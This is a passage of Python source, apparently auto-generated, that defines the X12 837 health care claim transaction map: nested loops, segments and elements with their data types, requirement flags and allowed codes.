"1", "30"), position=1, codes=[], ), ), Element( "HI02-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI02-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI02-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI02-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI02-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI02-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI02-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="03", ), Element( "HI03-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI03-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI03-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI03-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI03-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI03-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI03-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI03-08", 
Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI03-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="04", ), Element( "HI04-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI04-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI04-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI04-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI04-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI04-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI04-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI04-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI04-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="05", ), Element( "HI05-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI05-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI05-03", Properties( desc="Date Time Period Format Qualifier", 
req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI05-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI05-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI05-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI05-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI05-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI05-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="06", ), Element( "HI06-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI06-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI06-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI06-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI06-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI06-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI06-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI06-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( 
"HI06-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="07", ), Element( "HI07-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI07-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI07-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI07-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI07-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI07-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI07-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI07-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI07-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="08", ), Element( "HI08-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI08-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI08-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI08-04", Properties( desc="Date Time 
Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI08-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI08-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI08-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI08-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI08-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="09", ), Element( "HI09-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI09-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI09-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI09-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI09-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI09-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI09-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI09-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI09-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, 
codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="10", ), Element( "HI10-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI10-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI10-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI10-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI10-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI10-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI10-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI10-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI10-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="11", ), Element( "HI11-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI11-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI11-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI11-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI11-05", Properties( 
desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI11-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI11-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI11-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI11-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="12", ), Element( "HI12-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI12-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI12-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI12-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI12-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI12-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI12-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI12-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI12-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), ), Segment( "HCP", Properties( desc="Claim Pricing/Repricing Information", position="2410", 
repeat="1", req_sit="S", syntax="R0113 P0910 P1112", ), Element( "HCP01", Properties( desc="Pricing Methodology", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=[ "00", "01", "02", "03", "04", "05", "07", "08", "09", "10", "11", "12", "13", "14", ], ), ), Element( "HCP02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "HCP03", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=3, codes=[], ), ), Element( "HCP04", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=4, codes=[], ), ), Element( "HCP05", Properties( desc="Rate", req_sit="S", data_type=("R", "1", "9"), position=5, codes=[], ), ), Element( "HCP06", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=6, codes=[], ), ), Element( "HCP07", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=7, codes=[], ), ), Element( "HCP08", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=8, codes=[], ), ), Element( "HCP09", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=9, codes=[], ), ), Element( "HCP10", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=10, codes=[], ), ), Element( "HCP11", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=11, codes=[], ), ), Element( "HCP12", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=12, codes=[], ), ), Element( "HCP13", Properties( desc="Reject Reason Code", req_sit="S", data_type=("ID", "2", "2"), position=13, codes=["T1", "T2", "T3", "T4", "T5", "T6"], ), ), Element( "HCP14", Properties( desc="Policy Compliance Code", req_sit="S", data_type=("ID", "1", "2"), position=14, codes=["1", "2", "3", "4", "5"], ), ), Element( "HCP15", 
Properties( desc="Exception Code", req_sit="S", data_type=("ID", "1", "2"), position=15, codes=["1", "2", "3", "4", "5", "6"], ), ), ), parsed_837_2310A, parsed_837_2310B, parsed_837_2310C, parsed_837_2310D, parsed_837_2310E, parsed_837_2310F, parsed_837_2320, parsed_837_2400, ) parsed_837_2000C = Loop( "2000C", Properties( desc="Patient Hierarchical Level", looptype="", position="1400", repeat=">1", req_sit="S", ), Segment( "HL", Properties( desc="Patient Hierarchical Level", position="0010", repeat="1", req_sit="R", syntax="", ), Element( "HL01", Properties( desc="Hierarchical ID Number", req_sit="R", data_type=("AN", "1", "12"), position=1, codes=[], ), ), Element( "HL02", Properties( desc="Hierarchical Parent ID Number", req_sit="R", data_type=("AN", "1", "12"), position=2, codes=[], ), ), Element( "HL03", Properties( desc="Hierarchical Level Code", req_sit="R", data_type=("ID", "1", "2"), position=3, codes=["23"], ), ), Element( "HL04", Properties( desc="Hierarchical Child Code", req_sit="R", data_type=("ID", "1", "1"), position=4, codes=["0"], ), ), ), Segment( "PAT", Properties( desc="Patient Information", position="0070", repeat="1", req_sit="R", syntax="P0506 P0708", ), Element( "PAT01", Properties( desc="Individual Relationship Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["01", "19", "20", "21", "39", "40", "53", "G8"], ), ), Element( "PAT02", Properties( desc="Patient Location Code", req_sit="N", data_type=("ID", "1", "1"), position=2, codes=[], ), ), Element( "PAT03", Properties( desc="Employment Status Code", req_sit="N", data_type=("ID", "2", "2"), position=3, codes=[], ), ), Element( "PAT04", Properties( desc="Student Status Code", req_sit="N", data_type=("ID", "1", "1"), position=4, codes=[], ), ), Element( "PAT05", Properties( desc="Date Time Period Format Qualifier", req_sit="S", data_type=("ID", "2", "3"), position=5, codes=["D8"], ), ), Element( "PAT06", Properties( desc="Date Time Period", req_sit="S", data_type=("AN", 
"1", "35"), position=6, codes=[], ), ), Element( "PAT07", Properties( desc="Unit or Basis for Measurement Code", req_sit="S", data_type=("ID", "2", "2"), position=7, codes=["01"], ), ), Element( "PAT08", Properties( desc="Weight", req_sit="S", data_type=("R", "1", "10"), position=8, codes=[], ), ), Element( "PAT09", Properties( desc="Yes/No Condition or Response Code", req_sit="S", data_type=("ID", "1", "1"), position=9, codes=["Y"], ), ), ), parsed_837_2010CA, parsed_837_2300, ) parsed_837_2000B = Loop( "2000B", Properties( desc="Subscriber Hierarchical Level", looptype="", position="0200", repeat=">1", req_sit="R", ), Segment( "HL", Properties( desc="Subscriber Hierarchical Level", position="0010", repeat="1", req_sit="R", syntax="", ), Element( "HL01", Properties( desc="Hierarchical ID Number", req_sit="R", data_type=("AN", "1", "12"), position=1, codes=[], ), ), Element( "HL02", Properties( desc="Hierarchical Parent ID Number", req_sit="R", data_type=("AN", "1", "12"), position=2, codes=[], ), ), Element( "HL03", Properties( desc="Hierarchical Level Code", req_sit="R", data_type=("ID", "1", "2"), position=3, codes=["22"], ), ), Element( "HL04", Properties( desc="Hierarchical Child Code", req_sit="R", data_type=("ID", "1", "1"), position=4, codes=["0", "1"], ), ), ), Segment( "SBR", Properties( desc="Subscriber Information", position="0050", repeat="1", req_sit="R", syntax="", ), Element( "SBR01", Properties( desc="Payer Responsibility Sequence Number Code", req_sit="R", data_type=("ID", "1", "1"), position=1, codes=["A", "B", "C", "D", "E", "F", "G", "H", "P", "S", "T", "U"], ), ), Element( "SBR02", Properties( desc="Individual Relationship Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=["18"], ), ), Element( "SBR03", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "SBR04", Properties( desc="Name", req_sit="S", data_type=("AN", "1", "60"), position=4, codes=[], ), ), 
Element( "SBR05", Properties( desc="Insurance Type Code", req_sit="S", data_type=("ID", "1", "3"), position=5, codes=["12", "13", "14", "15", "16", "41", "42", "43", "47"], ), ), Element( "SBR06", Properties( desc="Coordination of Benefits Code", req_sit="N", data_type=("ID", "1", "1"), position=6, codes=[], ), ), Element( "SBR07", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=7, codes=[], ), ), Element( "SBR08", Properties( desc="Employment Status Code", req_sit="N", data_type=("ID", "2", "2"), position=8, codes=[], ), ), Element( "SBR09", Properties( desc="Claim Filing Indicator Code", req_sit="S", data_type=("ID", "1", "2"), position=9, codes=[ "11", "12", "13", "14", "15", "16", "17", "AM", "BL", "CH", "CI", "DS", "FI", "HM", "LM", "MA", "MB", "MC", "OF", "TV", "VA", "WC", "ZZ", ], ), ), ), Segment( "PAT", Properties( desc="Patient Information", position="0070", repeat="1", req_sit="S", syntax="P0506 P0708", ), Element( "PAT01", Properties( desc="Individual Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=1, codes=[], ), ), Element( "PAT02", Properties( desc="Patient Location Code", req_sit="N", data_type=("ID", "1", "1"), position=2, codes=[], ), ), Element( "PAT03", Properties( desc="Employment Status Code", req_sit="N", data_type=("ID", "2", "2"), position=3, codes=[], ), ), Element( "PAT04", Properties( desc="Student Status Code", req_sit="N", data_type=("ID", "1", "1"), position=4, codes=[], ), ), Element( "PAT05", Properties( desc="Date Time Period Format Qualifier", req_sit="S", data_type=("ID", "2", "3"), position=5, codes=["D8"], ), ), Element( "PAT06", Properties( desc="Date Time Period", req_sit="S", data_type=("AN", "1", "35"), position=6, codes=[], ), ), Element( "PAT07", Properties( desc="Unit or Basis for Measurement Code", req_sit="S", data_type=("ID", "2", "2"), position=7, codes=["01"], ), ), Element( "PAT08", Properties( desc="Weight", req_sit="S", data_type=("R", 
"1", "10"), position=8, codes=[], ), ), Element( "PAT09", Properties( desc="Yes/No Condition or Response Code", req_sit="S", data_type=("ID", "1", "1"), position=9, codes=["Y"], ), ), ), parsed_837_2010BA, parsed_837_2010BB, parsed_837_2300, parsed_837_2000C, ) parsed_837_2000A = Loop( "2000A", Properties( desc="Billing Provider Hierarchical Level", looptype="", position="0010", repeat=">1", req_sit="R", ), Segment( "HL", Properties( desc="Billing Provider Hierarchical Level", position="0010", repeat="1", req_sit="R", syntax="", ), Element( "HL01", Properties( desc="Hierarchical ID Number", req_sit="R", data_type=("AN", "1", "12"), position=1, codes=[], ), ), Element( "HL02", Properties( desc="Hierarchical Parent ID Number", req_sit="N", data_type=("AN", "1", "12"), position=2, codes=[], ), ), Element( "HL03", Properties( desc="Hierarchical Level Code", req_sit="R", data_type=("ID", "1", "2"), position=3, codes=["20"], ), ), Element( "HL04", Properties( desc="Hierarchical Child Code", req_sit="R", data_type=("ID", "1", "1"), position=4, codes=["1"], ), ), ), Segment( "PRV", Properties( desc="Billing Provider Specialty Information", position="0030", repeat="1", req_sit="S", syntax="P0203", ), Element( "PRV01", Properties( desc="Provider Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["BI"], ), ), Element( "PRV02", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["PXC"], ), ), Element( "PRV03", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "PRV04", Properties( desc="State or Province Code", req_sit="N", data_type=("ID", "2", "2"), position=4, codes=[], ), ), Composite( "C035", Properties( desc="Provider Specialty Information", refdes="", repeat="", req_sit="N", seq="05", ), ), Element( "PRV06", Properties( desc="Provider Organization Code", req_sit="N", data_type=("ID", "3", "3"), position=6, codes=[], ), 
), ), Segment( "CUR", Properties( desc="Foreign Currency Information", position="0100", repeat="1", req_sit="S", syntax="C0807 C0907 L101112 C1110 C1210 L131415 C1413 C1513 L161718 C1716 C1816 L192021 C2019 C2119", ), Element( "CUR01", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["85"], ), ), Element( "CUR02", Properties( desc="Currency Code", req_sit="R", data_type=("ID", "3", "3"), position=2, codes=[], ), ), Element( "CUR03", Properties( desc="Exchange Rate", req_sit="N", data_type=("R", "4", "10"), position=3, codes=[], ), ), Element( "CUR04", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "CUR05", Properties( desc="Currency Code", req_sit="N", data_type=("ID", "3", "3"), position=5, codes=[], ), ), Element( "CUR06", Properties( desc="Currency Market/Exchange Code", req_sit="N", data_type=("ID", "3", "3"), position=6, codes=[], ), ), Element( "CUR07", Properties( desc="Date/Time Qualifier", req_sit="N", data_type=("ID", "3", "3"), position=7, codes=[], ), ), Element( "CUR08", Properties( desc="Date", req_sit="N", data_type=("DT", "8", "8"), position=8, codes=[], ), ), Element( "CUR09", Properties( desc="Time", req_sit="N", data_type=("TM", "4", "8"), position=9, codes=[], ), ), Element( "CUR10", Properties( desc="Date/Time Qualifier", req_sit="N", data_type=("ID", "3", "3"), position=10, codes=[], ), ), Element( "CUR11", Properties( desc="Date", req_sit="N", data_type=("DT", "8", "8"), position=11, codes=[], ), ), Element( "CUR12", Properties( desc="Time", req_sit="N", data_type=("TM", "4", "8"), position=12, codes=[], ), ), Element( "CUR13", Properties( desc="Date/Time Qualifier", req_sit="N", data_type=("ID", "3", "3"), position=13, codes=[], ), ), Element( "CUR14", Properties( desc="Date", req_sit="N", data_type=("DT", "8", "8"), position=14, codes=[], ), ), Element( "CUR15", Properties( desc="Time", req_sit="N", 
data_type=("TM", "4", "8"), position=15, codes=[], ), ), Element( "CUR16", Properties( desc="Date/Time Qualifier", req_sit="N", data_type=("ID", "3", "3"), position=16, codes=[], ), ), Element( "CUR17", Properties( desc="Date", req_sit="N", data_type=("DT", "8", "8"), position=17, codes=[], ), ), Element( "CUR18", Properties( desc="Time", req_sit="N", data_type=("TM", "4", "8"), position=18, codes=[], ), ), Element( "CUR19", Properties( desc="Date/Time Qualifier", req_sit="N", data_type=("ID", "3", "3"), position=19, codes=[], ), ), Element( "CUR20", Properties( desc="Date", req_sit="N", data_type=("DT", "8", "8"), position=20, codes=[], ), ), Element( "CUR21", Properties( desc="Time", req_sit="N", data_type=("TM", "4", "8"), position=21, codes=[], ), ), ), parsed_837_2010AA, parsed_837_2010AB, parsed_837_2010AC, parsed_837_2000B, ) parsed_837_DETAIL = Loop( "DETAIL", Properties( desc="Table 2 - Detail", looptype="wrapper", position="0200", repeat=">1", req_sit="S", ), parsed_837_2000A, ) parsed_837_ST_LOOP = Loop( "ST_LOOP", Properties( desc="Transaction Set Header", looptype="explicit", position="0200", repeat=">1", req_sit="R", ), Segment( "ST", Properties( desc="Transaction Set Header", position="0050", repeat="1", req_sit="R", syntax="", ), Element( "ST01", Properties( desc="Transaction Set Identifier Code", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["837"], ), ), Element( "ST02", Properties( desc="Transaction Set Control Number", req_sit="R", data_type=("AN", "4", "9"), position=2, codes=[], ), ), Element( "ST03", Properties( desc="Implementation Convention Reference", req_sit="S", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), parsed_837_HEADER, parsed_837_DETAIL, Segment( "SE", Properties( desc="Transaction Set Trailer", position="5550", repeat="1", req_sit="R", syntax="", ), Element( "SE01", Properties( desc="Number of Included Segments", req_sit="R", data_type=("N0", "1", "10"), position=1, codes=[], ), ), Element( "SE02", 
Properties( desc="Transaction Set Control Number", req_sit="R", data_type=("AN", "4", "9"), position=2, codes=[], ), ), ), ) parsed_837_GS_LOOP = Loop( "GS_LOOP", Properties( desc="Functional Group Header", looptype="explicit", position="0200", repeat=">1", req_sit="R", ), Segment( "GS", Properties( desc="Functional Group Header", position="0100", repeat="1", req_sit="R", syntax="", ), Element( "GS01", Properties( desc="Functional Identifier Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["HC"], ), ), Element( "GS02", Properties( desc="Application Senders Code", req_sit="R", data_type=("AN", "2", "15"), position=2, codes=[], ), ), Element( "GS03", Properties( desc="124", req_sit="R", data_type=("AN", "2", "15"), position=3, codes=[], ), ), Element( "GS04", Properties( desc="Date", req_sit="R", data_type=("DT", "8", "8"), position=4, codes=[], ), ), Element( "GS05", Properties( desc="Time", req_sit="R", data_type=("TM", "4", "8"), position=5, codes=[], ), ), Element( "GS06", Properties( desc="Group Control Number", req_sit="R", data_type=("N0", "1", "9"), position=6, codes=[], ), ), Element( "GS07", Properties( desc="Responsible Agency Code", req_sit="R", data_type=("ID", "1", "2"), position=7, codes=["X"], ), ), Element( "GS08", Properties( desc="Version / Release / Industry Identifier Code", req_sit="R", data_type=("AN", "1", "12"), position=8, codes=["005010X222A1"], ), ), ), parsed_837_ST_LOOP, Segment( "GE", Properties( desc="Functional Group Trailer", position="0300", repeat="1", req_sit="R", syntax="", ), Element( "GE01", Properties( desc="97", req_sit="R", data_type=("N0", "1", "6"), position=1, codes=[] ), ), Element( "GE02", Properties( desc="Group Control Number", req_sit="R", data_type=("N0", "1", "9"), position=2, codes=[], ), ), ), ) parsed_837_ISA_LOOP = Loop( "ISA_LOOP", Properties( desc="Interchange Control Header", looptype="explicit", position="0010", repeat=">1", req_sit="R", ), Segment( "ISA", Properties( desc="Interchange 
Control Header", position="0100", repeat="1", req_sit="R", syntax="", ), Element( "ISA01", Properties( desc="I01", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["00", "03"], ), ), Element( "ISA02", Properties( desc="I02", req_sit="R", data_type=("AN", "10", "10"), position=2, codes=[], ), ), Element( "ISA03", Properties( desc="I03", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["00", "01"], ), ), Element( "ISA04", Properties( desc="I04", req_sit="R", data_type=("AN", "10", "10"), position=4, codes=[], ), ), Element( "ISA05", Properties( desc="I05", req_sit="R", data_type=("ID", "2", "2"), position=5, codes=["01", "14", "20", "27", "28", "29", "30", "33", "ZZ"], ), ), Element( "ISA06", Properties( desc="I06", req_sit="R", data_type=("AN", "15", "15"), position=6, codes=[], ), ), Element( "ISA07", Properties( desc="I05", req_sit="R", data_type=("ID", "2", "2"), position=7, codes=["01", "14", "20", "27", "28", "29", "30", "33", "ZZ"], ), ), Element( "ISA08", Properties( desc="I07", req_sit="R", data_type=("AN", "15", "15"), position=8, codes=[], ), ), Element( "ISA09", Properties( desc="I08", req_sit="R", data_type=("DT", "6", "6"), position=9, codes=[], ), ), Element( "ISA10", Properties( desc="I09", req_sit="R", data_type=("TM", "4", "4"), position=10, codes=[], ), ), Element( "ISA11", Properties( desc="I10", req_sit="R", data_type=("ID", "1", "1"), position=11, codes=[], ), ), Element( "ISA12", Properties( desc="I11", req_sit="R", data_type=("ID", "5", "5"), position=12, codes=["00501"], ), ), Element( "ISA13", Properties( desc="I12", req_sit="R", data_type=("N0", "9", "9"), position=13, codes=[], ), ), Element( "ISA14", Properties( desc="I13", req_sit="R", data_type=("ID", "1", "1"), position=14, codes=["0", "1"], ), ), Element( "ISA15", Properties( desc="I14", req_sit="R", data_type=("ID", "1", "1"), position=15, codes=["P", "T"], ), ), Element( "ISA16", Properties( desc="I15", req_sit="R", data_type=("AN", "1", "1"), position=16, 
